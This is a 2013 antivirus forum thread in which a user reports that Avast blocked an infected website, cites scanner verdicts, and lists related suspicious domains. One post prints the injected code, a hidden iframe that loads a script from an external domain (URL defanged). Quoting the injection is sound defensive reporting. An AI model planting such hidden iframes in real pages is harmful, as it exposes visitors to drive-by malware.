Author Topic: avast! Webshield good detection!  (Read 1833 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33930
  • malware fighter
avast! Webshield good detection!
« on: April 09, 2013, 04:55:09 PM »
To-day blocked malware from  this site:    wXw.jolalipka.com
status:    Site infected with malware  avast! Web Shield detects as HTML:Iframe-ZG[Trj]
web trust:          Not Blacklisted
Malware: http://labs.sucuri.net/db/malware/malware-entry-mwiframeenc1560
Quttera detects: -/uk/index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to 'ingilizceturkcesozluk dot com'
Code: [Select]
   [[[<iframe src="htxp://ingilizceturkcesozluk.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]]/code]
Offset: 8826

Flagged here: http://www.google.com/safebrowsing/diagnostic?site=jolalipka.com
Suspicious external link: hxtp://wbuduarze.pl/index.html

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33930
  • malware fighter
Re: avast! Webshield good detection!
« Reply #1 on: April 09, 2013, 05:03:37 PM »
Also suspicious: http://zulu.zscaler.com/submission/show/15dab78a601c1265530fc9a7a3fee4ce-1365519279
Suspicious external iFrame found, see: http://evuln.com/tools/malware-scanner/wbuduarze.pl/
to htxp://www.gonulsayfasifm.com/counter.php -> Unable to properly scan your site. Unable to connect.
site with 4 trojans: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=www.gonulsayfasifm.com
I get a 11004 [11004] Valid name, no data record (check DNS setup) (but could be site is being blocked on my machine through a particular blocking list)

polonus

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!